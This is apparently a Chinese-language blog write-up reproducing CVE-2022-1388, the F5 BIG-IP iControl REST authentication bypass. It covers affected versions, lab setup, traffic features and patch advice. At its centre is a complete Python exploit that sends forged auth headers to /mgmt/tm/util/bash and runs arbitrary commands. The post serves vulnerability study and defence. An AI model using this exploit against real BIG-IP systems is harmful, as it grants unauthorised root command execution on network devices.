CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现
目录
0x01 声明:
0x02 简介:
0x03 漏洞概述:
0x04 影响版本:
0x05 环境搭建:
下载环境:(要注册账号)
登录页面:
0x06 漏洞复现:
EXP地址:
修改EXP:
利用EXP:
0x07 流量分析:
说明:
特征一:(看到这个特征我就想起来CVE-2021-22986这个漏洞。)
特征二:
特征三:
0x08 修复建议:
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构 。
0x03 漏洞概述:
F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。
0x04 影响版本:
BIG-IP 16.x: 16.1.0 - 16.1.2
BIG-IP 15.x: 15.1.0 - 15.1.5
BIG-IP 14.x: 14.1.0 - 14.1.4
BIG-IP 13.x: 13.1.0 - 13.1.4
BIG-IP 12.x: 12.1.0 - 12.1.6
BIG-IP 11.x: 11.6.1 - 11.6.5
0x05 环境搭建:
下载环境:(要注册账号)
F5 - Login 选择存在漏洞版本。
选择OVA格式下载后直接导入VMware Workstation
登录页面:
0x06 漏洞复现:
EXP地址:
GitHub - bytecaps/CVE-2022-1388-EXP: CVE-2022-1388 F5 BIG-IP RCE 批量检测
修改EXP:
import requests
import json
import ssl
import urllib3urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()def attack(target_url, cmd):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",'Content-Type': 'application/json','Connection': 'Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host','X-F5-Auth-Token': 'a','Authorization': 'Basic YWRtaW46'}attack_url = target_url + '/mgmt/tm/util/bash'data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}try:response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)if response.status_code == 200 and 'commandResult' in response.text:default = json.loads(response.text)display = default['commandResult']print("[+] 目标 {} 存在漏洞".format(target_url))print('[+] 响应为:{0}'.format(display))else:print("[-] 目标 {} 不存在漏洞".format(target_url))except Exception as e:print('url 访问异常 {0}'.format(target_url))if __name__ == '__main__':target_url = input("请输入URL:")cmd = input("请输入执行的命令:")attack(target_url, cmd)print(target_url, cmd)
利用EXP:
0x07 流量分析:
说明:
由于抓到的流量都是TLS加密的流量,研究了很多天都没办法解密,所以只能分析EXP了,从EXP中不难发现有三个特征。
特征一:(看到这个特征我就想起来CVE-2021-22986这个漏洞。)
特征二:
特征三:
0x08 修复建议:
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。
链接:https://downloads.f5.com
CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现相关推荐
- CVE-2022-0543:redis lua沙盒绕过命令执行漏洞复现
#Redis简介 Redis 全称 Remote Dictionary Server(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关 ...
- couchdb 权限绕过 (CVE-2017-12635)复现
couchdb 权限绕过 (CVE-2017-12635)复现 couchdb 权限绕过 (CVE-2017-12635)复现 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 工具反弹sh ...
- 绕过WAF运行命令执行漏洞的方法大全
文章目录 **前言** **一.windows下** 二.进入linux 三.一个有趣的例子 总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深 ...
- 简谈命令执行漏洞绕过过滤
原文: https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247503891&idx=1&sn=791096c5cb ...
- 命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令.当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数. 比如PHP中的system,e ...
- 【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞
起序:客户内网测试的时候遇到的,搭建一个环境,写个笔记记录一下. 一.靶场环境 使用的是 github 上的 vulhub 环境.PostgreSQL 版本为 10.7. vulhub:https:/ ...
- linux dac 的权限,Samba CAP_DAC_OVERRIDE文件权限绕过安全限制漏洞
发布日期:2010-03-09 更新日期:2010-03-11 受影响系统: Samba Samba 3.5.0 Samba Samba 3.4.6 Samba Samba 3.3.11 不受影响系统 ...
- CVE-2020-16838 Windows tcp/ip 远程代码执行漏洞复现
漏洞环境 攻击机:windows 10 (python版本:3.7 ,安装了scapy依赖) 受害机环境:windows10 1909 受害机网络开启ipv6支持 打开cmd输入ipconfig查看受 ...
- 通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现
通达OA-命令执行 一.环境 安装文件: 链接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取码:2b3i 二.漏洞验证 任意文件上传漏洞 /is ...
最新文章
- html5拖动图像的关键字,6.7 拖放图像 - HTML5 Canvas 实战
- golang中的可见性
- UA MATH564 概率分布总结
- python对象一定要删除引用吗_Python:删除自引用对象
- 字体图标 —— IconMoon
- matlab遗传算法实例crtrp,遗传算法求解实例
- react中对象扩展运算符使用问题
- 小米蓝牙耳机驱动_硬核拆解——小米蓝牙耳机
- vi编辑器 常用命令汇总
- 基于JSP的旅游网站系统
- 服务器系统2008网络发现,Windows Server 2008中解决局域网共享发现问题
- 机器学习方法的基本分类
- AXURE RP 原型图绘制手册
- kdj买卖指标公式源码_精品 玩转KDJ【精准买卖提示、源码、副图、说明】
- 网络安全之认证,数字签名,报文摘要
- 如何查看网站被搜索引擎收录的情况
- STM32CubeMX创建F429/L475 HAL库工程并移植UCOSIII (二)(文末附源码)
- 2018-2-13-win10-uwp-切换主题
- 无法打开包括文件: “ocl_macros.h”: No such file or directory
- 面试之HashMap与HashTable
热门文章
- 医学知识---之T1,T2,flair,stir
- mysql 多表查询练习题(一)数据准备
- 操作记录-2020-11-08:精简代码处理RNA_seq数据
- Java中字符与字节常识
- kubectl describe命令详解
- CodeBlocks+wxWidgets
- JAVA基础-栈与堆,static、final修饰符、内部类和Java内存分配
- 笔试编程题 拼凑正方形 Java题解 牛牛有4根木棍,长度分别为a,b,c,d。羊羊家提供改变木棍长度的服务,如果牛牛支付一个硬币就可以让一根木棍的长度加一或者减一。牛牛需要用这四根木棍拼凑一个正方
- 求正方形的面积和缩放形状
- 注意!多款智能家居Hub存在远程代码执行漏洞